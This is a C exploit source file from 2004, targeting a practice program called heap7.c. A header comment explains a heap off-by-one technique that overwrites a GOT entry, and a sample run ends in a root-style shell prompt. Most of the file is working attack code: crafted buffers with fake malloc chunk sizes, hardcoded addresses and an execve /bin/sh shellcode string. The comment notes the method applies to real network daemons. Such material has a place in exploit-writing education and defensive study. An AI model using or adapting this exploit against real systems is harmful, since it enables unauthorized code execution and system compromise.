/*
 * $Id: heap7-ex2.c,v 1.1 2004/06/02 12:15:03 raptor Exp $
 *
 * heap7-ex2.c - heap7.c exploit (heap-based off-by-one)
 * Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * This exploit uses the heap-based off-by-one technique outlined in the
 * http://www.thc.org/root/docs/exploit_writing/heap_off_by_one.txt paper
 * by qitest1 <qitest1@bespin.org>. 
 *
 * The previous solution to heap6.c "has a big disadvantage: we need to control
 * the first 8 bytes of the buffer whose size is set to zero, and this is
 * improbable (even if not impossible) in real life. We need another idea. [...]
 * The remaining solution is to set the prev_size field to a negative value 
 * (i.e.: 0xfffffff0): this method allow us to write an arbitrary value in an 
 * arbitrary location: we put a fake malloc structure in the location pointed 
 * to by the negative prev_size. Nevertheless, after that it segfaults. This is 
 * generally not a problem in real programs, such as network daemons, because 
 * they always have signal handlers: if we patch the GOT entry of one of the 
 * functions called in the SIGSEGV handler (i.e.: syslog()), we can still 
 * control the program flow".
 *
 * Tested on both vanilla Linux and Linux/Openwall systems.
 *
 * Structure of buf1: ["A"x8] [FAKE_SIZE]
 * Structure of buf2: ["A"x9] [FAKE_SIZE] [FAKE_SIZE] [printf_addr - 12] [ret]
 *
 * raptor@dns:~/devel$ uname -a
 * Linux dns 2.2.26-ow1 #1 Tue Mar 2 10:22:13 CET 2004 i686 unknown
 * raptor@dns:~/devel$ gcc --version
 * 2.95.3
 * raptor@dns:~/devel$ ./heap7-ex2
 * Using ret address       : 0x8049a38
 * Using 2nd buf address   : 0x8049a10
 * Using printf() address  : 0x8049928
 * 
 * len0: 12
 * len1: 77
 * p0 -> 0x8049a00
 * p1 -> 0x8049a10
 * allocated size for p0: 17 (0x11)
 * allocated size for p1: 89 (0x59)
 * allocated size for p0: 17 (0x11)
 * allocated size for p1: 0 ((nil))
 * sh-2.05$ 
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define	VULN		"./heap7"	// the vulnerable program
#define BUF1SIZE	12 + 1		// size of buf1
#define BUF2SIZE	1024		// max size of buf2
#define	FAKE_SIZE	0xffffffe0	// -32 (PREV_INUSE = 0)
#define PRINTF		0x08049928	// printf() address in .got
#define	MALLOC		0x08049a10	// address of the second buffer

char sc[] = /* linux/x86 shellcode (12 + 24 = 36 bytes) */
"\xeb\x0aWHO_CARES?"
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/*
 * main()
 */
int main(int argc, char **argv)
{
	char	buf1[BUF1SIZE], buf2[BUF2SIZE];
	char	*p;

	int	printf_addr = PRINTF;
	int	ret = MALLOC + 15 + 9 + 16;

	/* prepare buf1 */
	p = buf1;
	memset(p, 'A', 8);
	p += 8;
	*((void **)p) = (void *)(FAKE_SIZE);
	p += 4;
	*p = 0x0;

	/* prepare buf2 */
	bzero(buf2, sizeof(buf2));
	p = buf2;
	memset(p, 'A', 9);
	p += 9;
	*((void **)p) = (void *)(FAKE_SIZE);
	p += 4;
	*((void **)p) = (void *)(FAKE_SIZE);
	p += 4;
	*((void **)p) = (void *)(printf_addr - 12);	/* fd field */
	p += 4;
	*((void **)p) = (void *)(ret);			/* bk field */
	p += 4;
	memcpy(p, sc, sizeof(sc) - 1);			/* shellcode */

	/* print some output */
	fprintf(stderr, "Using ret address\t: %p\n", ret);
	fprintf(stderr, "Using 2nd buf address\t: %p\n", MALLOC);
	fprintf(stderr, "Using printf() address\t: %p\n\n", printf_addr);

	/* run the vulnerable program */
	execl(VULN, VULN + 2, buf1, buf2, NULL);
	perror("execl");
}
